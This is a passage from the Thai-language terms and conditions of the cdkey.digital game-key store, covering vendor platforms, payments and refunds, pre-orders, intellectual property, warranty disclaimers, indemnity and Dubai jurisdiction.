6.4 โปรแกรมบางโปรแกรมมีให้ดาวน์โหลดไปยังคอมพิวเตอร์ของคุณหรืออุปกรณ์ท้องถิ่นอื่น ๆ ในขณะที่โปรแกรมอื่น ๆ นั้นโฮสต์อยู่บนเซิร์ฟเวอร์ภายนอกและพร้อมให้ใช้งานผ่านอินเทอร์เน็ตผ่านซอฟต์แวร์ผู้ใช้หรือลิงก์ของหน้าเว็บ ในกรณีของการใช้โปรแกรมดังกล่าวหรือปุ่มเสริมใดๆ คุณอาจจำเป็นต้องสร้างบัญชีกับผู้ขายที่เกี่ยวข้องหรือบุคคลภายนอกอื่นๆ (เช่น ผู้ให้บริการแพลตฟอร์มเกม) และคุณอาจต้องเชื่อมโยงบัญชีนั้นกับ cdkey.digital ของคุณ บัญชี .com ข้อมูลใดๆ ที่คุณให้กับผู้ขายหรือบุคคลภายนอกอื่นๆ จะอยู่ภายใต้ข้อกำหนดและเงื่อนไขของผู้ขาย หรือข้อกำหนดและเงื่อนไขของบุคคลที่สาม และจะไม่อยู่ภายใต้ข้อกำหนดและเงื่อนไขของ cdkey.digital หรือนโยบายความเป็นส่วนตัว

6.5 แพลตฟอร์มของผู้ขายโฮสต์และดูแลโดยผู้ขายที่เกี่ยวข้องหรือบุคคลที่สามรายอื่น เราไม่รับประกันว่าแพลตฟอร์มผู้ขายใดๆ จะพร้อมใช้งาน หรือยังคงพร้อมใช้งานสำหรับคุณ และเราจะไม่รับผิดชอบต่อการหยุดทำงานของแพลตฟอร์มผู้ขาย

6.6 คีย์เสริมอยู่ภายใต้การใช้งาน การเข้าถึง และข้อจำกัดอื่นๆ ที่อธิบายไว้ในหน้ารายละเอียดของโปรแกรมเสริมบนร้านค้าออนไลน์หรือระบุไว้เป็นอย่างอื่นในข้อตกลงนี้ คีย์เสริมบางรายการเป็นวัสดุสิ้นเปลือง เช่น สกุลเงินเสมือน และสามารถดาวน์โหลดเพียงครั้งเดียวและใช้กับอุปกรณ์เพียงเครื่องเดียว หากคุณซื้อโปรแกรมเสริม นั่นคือการสมัครรับข้อมูลหรือเริ่มการทดลองใช้ฟรีสำหรับการสมัครรับข้อมูลดังกล่าว และเว้นแต่คุณจะตั้งค่าการสมัครของคุณไม่ให้ต่ออายุโดยอัตโนมัติ เราอาจดำเนินการสมัครรับข้อมูลของคุณต่อโดยอัตโนมัติในราคาสมาชิกปกติโดยใช้วิธีการชำระเงิน เรามีบันทึกสำหรับคุณ

6.7 เมื่อคุณซื้อโปรแกรมและเราหรือผู้ขายทำให้สามารถใช้ได้ คุณต้องรับผิดชอบในการดาวน์โหลด (ถ้ามี) และยืนยันความสามารถของคุณในการเข้าถึงโปรแกรม รวมถึงการดึงคีย์ใบอนุญาตสำหรับโปรแกรม ถ้ามี และ คุณจะต้องแบกรับความเสี่ยงที่จะสูญเสียหลังจากนั้น รวมถึงความสูญเสียใดๆ อันเนื่องมาจากคอมพิวเตอร์หรือฮาร์ดไดรฟ์ทำงานผิดปกติ หากคุณไม่สามารถดาวน์โหลดหรือเข้าถึงโปรแกรมได้ โปรดติดต่อฝ่ายบริการลูกค้าของ cdkey.digital เพื่อขอความช่วยเหลือที่support@cdkey.digital

6.8 เราอาจจัดให้มีการจำกัดอายุและการให้คะแนนสำหรับโปรแกรมที่ผู้ขายหรือบุคคลภายนอกมอบให้เรา แม้ว่าเราจะกำหนดให้ผู้ขายให้ข้อมูลที่ถูกต้อง เกี่ยวกับเนื้อหาของโปรแกรม เราไม่สามารถรับรองได้ว่าการให้คะแนนของโปรแกรมนั้นถูกต้อง หรือโปรแกรมไม่ได้รวมเนื้อหาที่ไม่เหมาะสม อนาจาร หรือน่ารังเกียจ เราไม่รับผิดชอบต่อเนื้อหาของโปรแกรมใด ๆ ที่คุณพบว่าเป็นการล่วงละเมิด อนาจาร หรือน่ารังเกียจ

7. เนื้อหาผู้ใช้

7.1 เราไม่รับผิดชอบต่อการแสดงหรือการใช้เนื้อหาผู้ใช้ในทางที่ผิด คุณเป็นผู้รับผิดชอบแต่เพียงผู้เดียวสำหรับเนื้อหาและความเสียหายใดๆ ที่เกิดจากเนื้อหาของผู้ใช้ที่คุณส่ง โพสต์ อัปโหลด ลิงก์ไปยัง หรือทำให้พร้อมใช้งานบนร้านค้าออนไลน์ขณะใช้บริการ คุณรับทราบว่าความรับผิด ความสูญเสีย หรือความเสียหายใดๆ ที่เกิดขึ้นจากเนื้อหาของผู้ใช้ดังกล่าวถือเป็นความรับผิดชอบของคุณแต่เพียงผู้เดียว คุณดำเนินการและตกลงที่จะชดใช้ค่าเสียหายและปกป้องเรา (และบุคคลที่สาม) จากความรับผิด ความสูญเสีย หรือความเสียหายใดๆ ที่อาจเกิดขึ้นอันเป็นผลมาจากเนื้อหาของผู้ใช้ดังกล่าว

7.2 ในบางครั้ง ผู้ซื้ออาจส่งคำวิจารณ์ของผู้ขายและ/หรือโปรแกรม บทวิจารณ์เหล่านี้ไม่ถือเป็นการรับประกัน การรับประกัน หรือการคาดการณ์เกี่ยวกับผลลัพธ์ของบริการและ/หรือโปรแกรมของผู้ขายในอนาคต cdkey.digital จะไม่มีภาระผูกพันในการแสดงบทวิจารณ์ดังกล่าว และอาจลบบทวิจารณ์ดังกล่าวเมื่อใดก็ได้ตามดุลยพินิจของ cdkey.digital แต่เพียงผู้เดียว cdkey.digital จะไม่รับผิดชอบหรือรับผิดใด ๆ สำหรับบทวิจารณ์ใด ๆ ที่คุณพบในหรือผ่านร้านค้าออนไลน์ และการใช้หรือพึ่งพาบทวิจารณ์ดังกล่าวถือเป็นความเสี่ยงของคุณเอง

7.3 เนื้อหาทั้งหมดที่โพสต์บนร้านค้าออนไลน์ เช่น โพสต์บนบล็อกหรือบทวิจารณ์ จัดทำขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลเท่านั้น โดยไม่มีการรับประกันว่าเนื้อหาดังกล่าวเป็นความจริง ถูกต้อง หรือถูกต้อง

7.4 ผู้ใช้รับรองและรับประกันว่าพวกเขามีสิทธิ์โพสต์เนื้อหาผู้ใช้ทั้งหมดที่ส่ง โดยเฉพาะอย่างยิ่ง ผู้ใช้รับประกันว่าพวกเขาได้ปฏิบัติตามใบอนุญาตของบุคคลที่สามที่เกี่ยวข้องกับเนื้อหาของผู้ใช้ (ถ้ามี) โดยสมบูรณ์ และได้ดำเนินการตามขั้นตอนทั้งหมดที่จำเป็นเพื่อส่งต่อข้อกำหนดที่จำเป็นใดๆ ให้กับผู้ใช้ปลายทาง

7.5 ผู้ใช้ตกลงและรับทราบว่า cdkey.digital มีสิทธิ์ดูและตรวจสอบเนื้อหาของผู้ใช้ตามดุลยพินิจของตนแต่เพียงผู้เดียว และเพื่อพิจารณาว่าเนื้อหาของผู้ใช้มีความเหมาะสมและสอดคล้องกับข้อกำหนดและเงื่อนไขเหล่านี้หรือไม่ หรือปฏิเสธหรือลบเนื้อหาใดๆ เนื้อหาผู้ใช้ซึ่งตามความเห็นที่สมเหตุสมผลของ cdkey.digital ละเมิดนโยบายของ cdkey.digital หรือเป็นอันตราย ไม่เหมาะสม หรือน่ารังเกียจในทางใดทางหนึ่ง คุณตกลงเพิ่มเติมว่า cdkey.digital มีสิทธิ์ในการจัดรูปแบบ แก้ไข และเปลี่ยนแปลงอื่นๆ ในเนื้อหาของผู้ใช้หรือลักษณะที่แสดงเนื้อหาของผู้ใช้บนร้านค้าออนไลน์

7.6 ยกเว้นเนื้อหาที่มาจาก cdkey.digital เราไม่อ้างสิทธิ์ความเป็นเจ้าของเนื้อหาใด ๆ ที่คุณโพสต์ อัปโหลดหรือเชื่อมโยง คุณยังคงเป็นเจ้าของ ควบคุม และรับผิดชอบต่อเนื้อหาของผู้ใช้ที่คุณโพสต์ โดยการโพสต์เนื้อหาใดๆ รวมถึงแต่ไม่จำกัดเพียงภาพถ่าย วิดีโอ บันทึก โลโก้บริษัทและบทวิจารณ์ผ่านร้านค้าออนไลน์ แสดงว่าคุณให้สิทธิ์แก่ cdkey.digital และผู้สืบทอดของเราอย่างชัดแจ้งทั่วโลก อนุญาตให้ใช้สิทธิ์ช่วง ชำระเงินเต็มจำนวนและไม่มีค่าลิขสิทธิ์ และไม่ใช่ สิทธิ์การใช้งาน ทำซ้ำ แสดง แก้ไข ดัดแปลง และแจกจ่ายเนื้อหาที่เกี่ยวข้องกับวัตถุประสงค์ทางธุรกิจและการตลาดของ cdkey.digital แต่เพียงผู้เดียว

8. การชำระเงิน

8.1 ผู้ซื้อตกลงที่จะชำระราคาโปรแกรมให้กับ cdkey.digital ตามที่ระบุไว้ในคำสั่งยืนยัน ผู้ซื้อมีความรับผิดชอบในการให้เป็นวิธีที่ถูกต้องของการชำระเงินรวมถึง แต่ไม่ จำกัด เพียง, MasterCard, Maestro, Visa, American Express, Diners Club, Discover, PayPal, Sofort, Skrill, Alipay, แอปเปิ้ลจ่าย Giropay, Neteller, Bitcoin เหมาะ เป็นต้น

8.2 การชำระเงินออนไลน์อาจอยู่ภายใต้ข้อกำหนดและเงื่อนไขของผู้ขายเพิ่มเติมจากข้อตกลงนี้ คุณตกลงที่จะตรวจสอบข้อกำหนดและเงื่อนไขของผู้ขายดังกล่าวก่อนทำการชำระเงินใดๆ บน cdkey.digital และการชำระเงินออนไลน์ใดๆ ที่ผู้ซื้อทำขึ้นจะถือเป็นหลักฐานที่แสดงว่าผู้ซื้อยอมรับข้อกำหนดและเงื่อนไขของผู้ขายดังกล่าวและนโยบายความเป็นส่วนตัวที่เกี่ยวข้อง

8.3 ผู้ซื้อตกลงและรับทราบว่าราคาโปรแกรม (หรือบางส่วน) ไม่สามารถขอคืนเงินได้

8.4 หลังจากที่ผู้ซื้อชำระเงินให้กับ cdkey.digital เรียบร้อยแล้ว cdkey.digital จะส่งการยืนยันจำนวนเงินที่ได้รับ ผู้ขายจะออกใบแจ้งหนี้สำหรับธุรกรรมนี้ไปที่ cdkey.digital เมื่อมีการร้องขอและเมื่อได้รับใบแจ้งหนี้ดังกล่าวจากผู้ขาย cdkey.digital จะส่งใบแจ้งหนี้ไปยังผู้ซื้อ 

8.5 ผู้ซื้อตกลงและรับทราบว่า cdkey.digital มีสิทธิ์ที่จะชะลอหรือปฏิเสธการซื้อโปรแกรมใดๆ ด้วยเหตุผลใดก็ตาม ข้อจำกัดอาจนำไปใช้กับจำนวนและจำนวนของโปรแกรมที่คุณสามารถซื้อผ่านร้านค้าออนไลน์ 

8.6 เราเสนอการคืนเงินตามดุลยพินิจ และคำขอคืนเงินแต่ละรายการจะพิจารณาเป็นรายบุคคล เราพยายามอย่างเต็มที่ที่จะคืนเงินให้หากเป็นไปได้ แต่โปรดทราบว่าเกมที่เล่นหรือคีย์ที่แลกไปแล้วจะไม่มีสิทธิ์ได้รับเงินคืน คำขอคืนเงินจะต้องส่งภายใน 7 วันนับจากวันที่ผู้ขายส่งมอบกุญแจให้กับผู้ซื้อหรือลูกค้า

9. พรีออเดอร์

9.1 ผู้ซื้อสามารถสั่งจองโปรแกรมล่วงหน้าผ่านทางร้านค้าออนไลน์ ผู้ซื้อตกลงและเข้าใจว่าจะต้องชำระเงินสำหรับโปรแกรมสั่งจองล่วงหน้าในวันที่สั่งซื้อ แต่โปรแกรมจะถูกส่งไปยังผู้ซื้อตามวันที่ที่ระบุไว้ในร้านค้าออนไลน์

9.2 แม้ว่า cdkey.digital จะใช้ความพยายามอย่างเต็มที่ในการส่งมอบคีย์ซีดีสำหรับโปรแกรมที่สั่งซื้อล่วงหน้าก่อนวันวางจำหน่ายอย่างเป็นทางการที่ระบุไว้ในร้านค้าออนไลน์ cdkey.digital ไม่รับประกันว่าคีย์ซีดีสำหรับโปรแกรมที่สั่งซื้อล่วงหน้าจะต้อง จัดส่งก่อนวันวางจำหน่ายอย่างเป็นทางการ cdkey.digital จะไม่รับผิดชอบต่อความล่าช้าและ/หรือความล้มเหลวใดๆ ที่เกี่ยวข้องกับการส่งมอบโปรแกรมที่สั่งซื้อล่วงหน้า cdkey.digital อาจรับประกันการส่งมอบคีย์ซีดีที่ได้รับจากผู้ขายเท่านั้น

9.3 ผู้ซื้อรับทราบว่าราคาของโปรแกรมที่สั่งซื้อล่วงหน้าอาจแตกต่างกันไปในบางครั้ง ผู้ซื้อรับทราบเพิ่มเติมว่าการขายโปรแกรมที่สั่งซื้อล่วงหน้าอาจถูกเพิกถอนด้วยเหตุผลใดๆ ก็ตาม ซึ่งในกรณีนี้ราคาโปรแกรมที่จ่ายสำหรับโปรแกรมที่สั่งซื้อล่วงหน้าจะได้รับเงินคืนโดยผู้ขาย

10. เนื้อหาของบุคคลที่สาม

10.1 ในฐานะที่เป็นส่วนหนึ่งของบริการ cdkey.digital อาจให้ลิงก์ที่สะดวกแก่คุณไปยังแพลตฟอร์มของบุคคลภายนอก ตลอดจนรูปแบบอื่นๆ ของเนื้อหาของบุคคลที่สาม ลิงก์เหล่านี้จัดทำขึ้นเพื่อเป็นการเอื้อเฟื้อแก่คุณ และเราไม่สามารถควบคุมแพลตฟอร์มหรือเนื้อหาของบุคคลที่สามหรือโปรโมชั่น เนื้อหา ข้อมูล สินค้าหรือบริการที่มีอยู่ได้ เราไม่รับผิดชอบต่อเนื้อหาของบุคคลที่สามที่เข้าถึงผ่านร้านค้าออนไลน์ของเรา หากคุณตัดสินใจออกจากร้านค้าออนไลน์และเข้าถึงเนื้อหาของบุคคลที่สาม คุณต้องยอมรับความเสี่ยงเอง และคุณควรตระหนักว่าข้อกำหนดและเงื่อนไขของเราและนโยบายอื่นๆ จะไม่มีผลบังคับอีกต่อไป

10.2 เพื่อหลีกเลี่ยงข้อสงสัย ข้อตกลงนี้ไม่อนุญาตให้คุณเผยแพร่ แสดงต่อสาธารณะ แสดงต่อสาธารณะ ทำให้พร้อมใช้งาน เปลี่ยนแปลง หรือใช้เนื้อหาของบุคคลที่สาม

11. ทรัพย์สินทางปัญญา

11.1 cdkey.digital ยังคงเป็นเจ้าของสิทธิ์ในทรัพย์สินทางปัญญาทุกประเภทที่เกี่ยวข้องกับ cdkey.digital ร้านค้าออนไลน์และบริการ รวมถึงลิขสิทธิ์ สิทธิบัตร เครื่องหมายการค้า และกรรมสิทธิ์อื่นๆ เครื่องหมายการค้า เครื่องหมายบริการ กราฟิกและโลโก้อื่นๆ ที่ใช้กับร้านค้าออนไลน์และบริการ อาจเป็นเครื่องหมายการค้าของบุคคลที่สามอื่นๆ ข้อตกลงนี้ไม่ได้ถ่ายโอนจากเราไปยัง cdkey.digital หรือทรัพย์สินทางปัญญาของบุคคลที่สาม จากเราไปยัง cdkey.digital หรือทรัพย์สินทางปัญญาของบุคคลที่สาม และสิทธิ์ กรรมสิทธิ์ และผลประโยชน์ทั้งหมดในและต่อทรัพย์สินดังกล่าวจะยังคงอยู่ (ระหว่างคู่สัญญา) กับเราแต่เพียงผู้เดียว เราขอสงวนสิทธิ์ทั้งหมดที่ไม่ได้มอบให้คุณโดยชัดแจ้งภายใต้ข้อตกลงนี้

11.2 โดยเฉพาะ cdkey.digital, wwwcdkey.digital , Omnyex และเครื่องหมายการค้าทั้งหมดที่ปรากฏ ถูกแสดง หรือใช้บนร้านค้าออนไลน์เป็นครั้งคราวหรือเป็นส่วนหนึ่งของบริการ เป็นเครื่องหมายการค้าจดทะเบียนของ cdkey.digital และห้ามคัดลอก ดาวน์โหลด ทำซ้ำ ใช้ แก้ไข หรือแจกจ่ายในทางใดทางหนึ่งโดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษรล่วงหน้าจาก cdkey.digital

11.3 หากคุณเชื่อว่าเนื้อหาใด ๆ ที่อยู่บนหรือเชื่อมโยงกับ cdkey.digital ละเมิดลิขสิทธิ์ของคุณหรือสิทธิ์ในทรัพย์สินทางปัญญาอื่น ๆ โปรดแจ้งให้เราทราบ เราจะยุติการเข้าถึงของผู้ใช้ใน (และการใช้) ร้านค้าออนไลน์ หากภายใต้สถานการณ์ที่เหมาะสม ผู้ใช้ถูกกำหนดให้เป็นผู้ละเมิดลิขสิทธิ์หรือสิทธิ์ในทรัพย์สินทางปัญญาอื่น ๆ ของ cdkey.digital หรือผู้อื่นโดยไม่มีสิทธิ์และการอนุญาตที่จำเป็น

12. การสื่อสารทางอีเมล

12.1 เราใช้อีเมลและวิธีการอิเล็กทรอนิกส์เพื่อติดต่อกับผู้ใช้ของเรา คุณตกลงและเข้าใจว่าเราอาจส่งอีเมลถึงคุณเกี่ยวกับบริการในอนาคตและ/หรือการอัปเดตเกี่ยวกับโปรแกรม ผู้ใช้ที่ต้องการไม่รับข้อเสนอและการอัปเดตจากเราอาจแจ้งให้เราทราบได้ตลอดเวลาโดยใช้วิธีการติดต่อที่ระบุไว้ในส่วนติดต่อเรา

12.2 สำหรับวัตถุประสงค์ตามสัญญา ผู้ใช้ (i) ยินยอม: เพื่อรับการสื่อสารจาก cdkey.digital ในรูปแบบอิเล็กทรอนิกส์ผ่านที่อยู่อีเมลที่พวกเขาได้ส่งมาหรือผ่านทางร้านค้าออนไลน์; และ (ii) ตกลงว่าข้อกำหนดและเงื่อนไข ข้อตกลง ประกาศ การเปิดเผย และการสื่อสารอื่น ๆ ทั้งหมดที่ cdkey.digital มอบให้ทางอิเล็กทรอนิกส์ เป็นไปตามข้อกำหนดทางกฎหมายใด ๆ ที่การสื่อสารดังกล่าวจะเป็นไปตามหากเป็นลายลักษณ์อักษรหรือทางไปรษณีย์แบบดั้งเดิม และ (iii) โดยปราศจากอคติต่อข้อ no.12.2(i) และ no.12.2(ii) ผู้ใช้ตกลงที่จะปฏิบัติตามข้อ no. 16.5 เพื่อวัตถุประสงค์ในการแจ้งเตือนใด ๆ

13. การยกเลิก

13.1 หากคุณต้องการยุติข้อตกลงนี้ คุณสามารถยุติการใช้ cdkey.digital ได้ หากคุณต้องการลบข้อมูลบัญชีของคุณ โปรดติดต่อ cdkey.digital เราจะเก็บรักษาและใช้ข้อมูลของคุณเท่าที่จำเป็นเพื่อปฏิบัติตามภาระผูกพันทางกฎหมายของเรา เพื่อแก้ไขข้อพิพาท และเพื่อบังคับใช้ข้อตกลงของเรา และเราจะลบโปรไฟล์ทั้งหมดของคุณในขอบเขตที่เป็นไปได้ (ถ้ามี)

13.2 สิทธิ์ของคุณภายใต้ข้อตกลงนี้จะสิ้นสุดลงโดยอัตโนมัติโดยไม่ต้องแจ้งให้ทราบและไม่มีการคืนเงินค่าธรรมเนียมใด ๆ หากคุณไม่ปฏิบัติตามข้อกำหนดของข้อตกลงนี้

13.3 บทบัญญัติทั้งหมดของข้อตกลงนี้ ซึ่งโดยธรรมชาติแล้วควรคงอยู่ต่อไปหลังจากการยุติ จะคงอยู่ต่อไปหลังจากการยุติ ซึ่งรวมถึงแต่ไม่จำกัดเพียงข้อกำหนดความเป็นเจ้าของ การปฏิเสธการรับประกัน การชดใช้ค่าเสียหาย และข้อจำกัดความรับผิด

14. การปฏิเสธการรับประกัน

14.1 เราไม่รับรองหรือรับประกันว่าข้อมูลที่เราให้ หรือที่ให้ผ่านบริการนั้นถูกต้อง เชื่อถือได้ หรือถูกต้อง ว่าบริการ บริการของผู้ขาย หรือโปรแกรมจะตรงตามความต้องการของคุณ ว่าบริการจะพร้อมใช้งานในเวลาหรือสถานที่ใด ๆ ว่าบริการจะทำงานโดยไม่หยุดชะงักหรือปลอดภัย ว่าข้อบกพร่องหรือข้อผิดพลาดใด ๆ จะได้รับการแก้ไข หรือบริการปราศจากไวรัสหรือส่วนประกอบที่เป็นอันตรายอื่นๆ คุณรับผิดชอบอย่างเต็มที่และเสี่ยงต่อการสูญเสียอันเป็นผลมาจากการใช้ข้อมูล เนื้อหา หรือวัสดุอื่นๆ ที่ได้รับจากผู้ขายหรือบริการ

14.2 คุณมีหน้าที่รับผิดชอบแต่เพียงผู้เดียวสำหรับการสื่อสารและการโต้ตอบทั้งหมดของคุณกับผู้ใช้รายอื่น ตามความเหมาะสม และกับบุคคลอื่นที่คุณสื่อสารหรือโต้ตอบด้วยอันเป็นผลมาจากการใช้บริการของคุณ คุณเข้าใจดีว่า cdkey.digital ไม่จำเป็นต้องคัดกรองหรือสอบถามเกี่ยวกับภูมิหลังของผู้ขายหรือบริการของผู้ขาย และ cdkey.digital จะไม่พยายามตรวจสอบคำชี้แจงของผู้ขาย

14.3 CDKeys.com ไม่รับประกัน ไม่ว่าโดยชัดแจ้งหรือโดยนัย ในส่วนที่เกี่ยวกับผู้ขายและโปรแกรม และขอปฏิเสธการรับประกันใด ๆ ในขอบเขตสูงสุดที่มีอยู่ cdkey.digital ไม่มีอำนาจควบคุม และไม่รับประกัน: การมีอยู่ คุณภาพ ความปลอดภัย หรือความถูกต้องตามกฎหมายของโปรแกรมหรือบริการของผู้ขาย ความจริงหรือความถูกต้องของรายละเอียดโปรแกรมใดๆ ความสามารถของผู้ขายในการดำเนินการบริการของผู้ขาย หรือบริการของผู้ขายจะพร้อมให้บริการ ณ เวลาหรือสถานที่ใดโดยเฉพาะ cdkey.digital ไม่รับประกันหรือรับประกันว่าบริการของผู้ขายที่เสนอผ่านร้านค้าออนไลน์จะเป็นไปตามข้อกำหนดของผู้ซื้อ คุณตกลงที่จะใช้ความระมัดระวังตามสมควรในการสื่อสารและการโต้ตอบทั้งหมดกับผู้ใช้รายอื่น และกับบุคคลอื่นที่คุณสื่อสารหรือโต้ตอบด้วยอันเป็นผลมาจากการใช้บริการของคุณ

15. การปล่อยตัวและการชดใช้ค่าเสียหาย

15.1 ผู้ใช้ตกลงที่จะชดใช้ค่าเสียหายและปกป้อง cdkey.digital จากการเรียกร้อง ความต้องการ การดำเนินการ ความสูญเสีย ความเสียหาย การประเมิน ค่าใช้จ่าย ความรับผิดของบุคคลที่สาม ต้นทุนและค่าใช้จ่ายใดๆ และทั้งหมดที่อาจเกิดขึ้นอันเนื่องมาจาก: (i) การใช้งานร้านค้าออนไลน์และบริการของผู้ใช้หรือการละเมิดข้อตกลงนี้ หรือ (ii) การบาดเจ็บ อุบัติเหตุ ปัญหาสุขภาพ ความเสียหายทางกายภาพหรือทรัพย์สิน การสูญเสียผลกำไร ทรัพย์สินหรือชื่อเสียงทางธุรกิจ หรืออย่างอื่นที่อาจเกิดจากการใช้บริการ บริการของผู้ขาย และ/หรือเกี่ยวข้องกับ โปรแกรม; หรือ (iii) ข้อผิดพลาด ข้อผิดพลาด,หรือความไม่ถูกต้องของเนื้อหาผู้ใช้ และ/หรือข้อมูลที่มีอยู่ในหรือผ่านร้านค้าออนไลน์ หรือ (iv) บั๊ก ไวรัส ม้าโทรจัน หรือสิ่งที่คล้ายกัน ซึ่งอาจส่งโดยคุณไปยังหรือผ่านร้านค้าออนไลน์ หรือ (v) ข้อพิพาท ความขัดแย้ง หรือการไม่เห็นด้วยกับผู้ซื้อและผู้ขายหรือบุคคลภายนอกที่เกี่ยวข้องกับบริการหรือโปรแกรมของผู้ขาย

15.2 หากคุณมีข้อพิพาทกับผู้ใช้รายอื่น คุณจะปล่อย cdkey.digital จากการเรียกร้อง ความต้องการ และความเสียหายใดๆ และทั้งหมด (ที่เกิดขึ้นจริงและเป็นผลสืบเนื่อง) หรือการสูญเสียทุกประเภทและลักษณะที่เกิดขึ้นจากข้อพิพาทดังกล่าว

15.3 ผู้ซื้อตกลงว่า cdkey.digital และผู้ขายแต่ละรายร่วมกันและหลายรายมีอำนาจในการยื่นฟ้องและดำเนินคดีกับผู้ซื้อในส่วนที่เกี่ยวกับการเรียกร้อง ความต้องการ การดำเนินการ ความสูญเสีย ความเสียหาย ค่าปรับ ค่าใช้จ่าย ความรับผิด ต้นทุนและค่าใช้จ่ายใดๆ ได้รับความทุกข์ทรมานหรือเกิดขึ้นจาก cdkey.digital และ/หรือผู้ขาย ไม่ว่าโดยตรงหรือโดยอ้อม และเกิดขึ้นโดยผู้ซื้ออันเป็นผลมาจากการที่ผู้ซื้อใช้บริการและ/หรือโปรแกรมใดๆ

15.4 คุณตกลงว่าไม่ว่าในกรณีใด cdkey.digital จะไม่รับผิด รับผิดชอบ หรืออย่างอื่นต่อคุณหรือต่อบุคคลที่สามสำหรับความเสียหายหรือความสูญเสียที่อาจเกิดขึ้นจาก: (i) ความล้มเหลว การหยุดชะงักหรือการหยุดชะงักของบริการใด ๆ เพื่อรักษาการเข้าถึงของคุณ ไปยังร้านค้าออนไลน์หรือบริการ ไม่ว่า cdkey.digital จะให้บริการหรือบุคคลที่สามก็ตาม หรือ (ii) คุณภาพ ความถูกต้อง ความตรงต่อเวลา ความน่าเชื่อถือ ความปลอดภัย ประสิทธิภาพของผู้ขาย บริการของผู้ขาย โปรแกรมและ/หรือร้านค้าออนไลน์ ความครบถ้วนหรือความล่าช้า การละเมิด การละเว้น หรือการหยุดชะงักในการส่งมอบบริการ โปรแกรม หรือ บริการของผู้ขาย; หรือ (iii) ข้อผิดพลาด ความผิดพลาด หรือความไม่ถูกต้องของเนื้อหา โปรแกรม และ/หรือเนื้อหาของ cdkey.digital และ/หรือข้อมูลที่มีอยู่ในหรือผ่านร้านค้าออนไลน์ หรือ (iv) การเข้าถึงหรือใช้งานเซิร์ฟเวอร์ของเราโดยไม่ได้รับอนุญาตและ/หรือข้อมูลส่วนบุคคลใด ๆ และทั้งหมดที่จัดเก็บไว้ในนั้น และ/หรือการหยุดชะงักหรือการหยุดส่งไปยังหรือจากเซิร์ฟเวอร์ของเรา และ/หรือข้อบกพร่อง ไวรัส ม้าโทรจัน หรือสิ่งที่คล้ายกันซึ่งอาจส่งไปยังหรือผ่านร้านค้าออนไลน์โดยบุคคลที่สาม หรือ (v) ความล้มเหลวหรือความล่าช้าในการทำธุรกรรมใด ๆ ผ่านร้านค้าออนไลน์และ/หรือบริการหรือ; (vi) ข้อพิพาท ความขัดแย้ง หรือไม่เห็นด้วยระหว่างผู้ขายกับผู้ซื้อหรือบุคคลภายนอกที่เกี่ยวข้องกับบริการ บริการของผู้ขาย หรือโปรแกรม; หรือ (vii) การคืนเงิน การสูญเสียผลกำไร การสูญเสียชื่อเสียงทางธุรกิจ (ไม่ว่าจะเกิดขึ้นโดยตรงหรือโดยอ้อม) การบาดเจ็บหรืออุบัติเหตุหรือความเสียหายทางกายภาพหรือทรัพย์สินหรือปัญหาสุขภาพ หรืออย่างอื่นที่อาจเกิดขึ้นกับคุณอันเป็นผลมาจากการใช้บริการของผู้ขายใดๆ และ/หรือเกี่ยวข้องกับโปรแกรม หรือ (viii) การละเมิดทรัพย์สินทางปัญญาที่อาจเกิดขึ้นจากการใช้โปรแกรมและ/หรือบริการของผู้ขาย

 

16. เบ็ดเตล็ด

16.1 กฎหมายที่ใช้บังคับ: ข้อตกลงนี้ระหว่างคุณและ cdkey.digital และการเข้าถึงหรือใช้ร้านค้าออนไลน์และ/หรือบริการใดๆ อยู่ภายใต้กฎหมายของรัฐบาลกลางของสหรัฐอาหรับเอมิเรตส์ ข้อพิพาทใดๆ ที่อาจเกิดขึ้นระหว่างผู้ใช้และ cdkey.digital ที่เกี่ยวข้องกับการดำเนินการหรือการตีความข้อตกลงนี้ จะต้องได้รับการระงับอย่างฉันมิตร หากไม่สำเร็จ ศาลของดูไบจะเป็นหน่วยงานที่มีอำนาจในการระงับข้อพิพาท

16.2 ความเป็นเอกเทศ: หากส่วนใดส่วนหนึ่งของข้อตกลงนี้ถือเป็นโมฆะหรือไม่สามารถบังคับใช้ได้ ส่วนนั้นของข้อตกลงจะถูกตีความเพื่อสะท้อนถึงเจตนาดั้งเดิมของคู่สัญญา ส่วนที่เหลือจะยังคงมีผลบังคับอย่างเต็มที่ ความล้มเหลวใด ๆ ในส่วนของ cdkey.digital ในการบังคับใช้ข้อกำหนดใด ๆ ของข้อตกลงนี้จะไม่ถือเป็นการสละสิทธิ์ของเราในการบังคับใช้ข้อกำหนดดังกล่าว สิทธิ์ของเราภายใต้ข้อตกลงนี้จะคงอยู่ต่อไปจนกว่าจะมีการยุติข้อตกลงนี้

16.3 ความสามารถในการมอบหมาย: cdkey.digital อาจมอบหมายหรือมอบสิทธิ์หรือภาระผูกพันภายใต้ข้อกำหนดและเงื่อนไขเหล่านี้ และ/หรือนโยบายความเป็นส่วนตัวของ cdkey.digital ทั้งหมดหรือบางส่วนให้กับบุคคลหรือนิติบุคคลใด ๆ ได้ตลอดเวลาโดยมีความยินยอมหรือไม่ได้รับความยินยอมจากคุณ คุณไม่สามารถมอบหมายหรือมอบหมายสิทธิ์หรือภาระผูกพันใด ๆ ของคุณภายใต้ข้อกำหนดและเงื่อนไขหรือนโยบายความเป็นส่วนตัวโดยไม่ได้รับความยินยอมเป็นลายลักษณ์อักษรล่วงหน้าจาก cdkey.digital และการมอบหมายและการมอบหมายที่ไม่ได้รับอนุญาตโดยคุณจะถือเป็นโมฆะ

16.4 คำบอกกล่าวแก่ผู้ใช้: cdkey.digital อาจส่งรายงาน คำชี้แจง ประกาศ และการสื่อสารอื่นใดไปยังผู้ใช้ผ่านที่อยู่อีเมลที่ระบุโดยพวกเขาในบัญชีของตน การสื่อสารและประกาศทั้งหมดจะถือว่าให้บริการอย่างถูกต้องแก่ผู้ใช้เมื่อ cdkey.digital ส่งทางอิเล็กทรอนิกส์ไปยังผู้ใช้ตามที่อยู่อีเมลที่ระบุในบัญชีผู้ใช้

16.5 การแจ้งไปยัง cdkey.digital ผู้ใช้อาจส่งรายงาน คำชี้แจง ประกาศ และการสื่อสารอื่นใดไปยัง cdkey.digital ที่info@cdkey.digital การสื่อสารและประกาศทั้งหมดจะถือว่าได้รับหรือให้บริการ (ตามความเหมาะสม) ไปยัง cdkey.digital เมื่อ cdkey.digital ได้รับทางอิเล็กทรอนิกส์ที่info@cdkey.digital

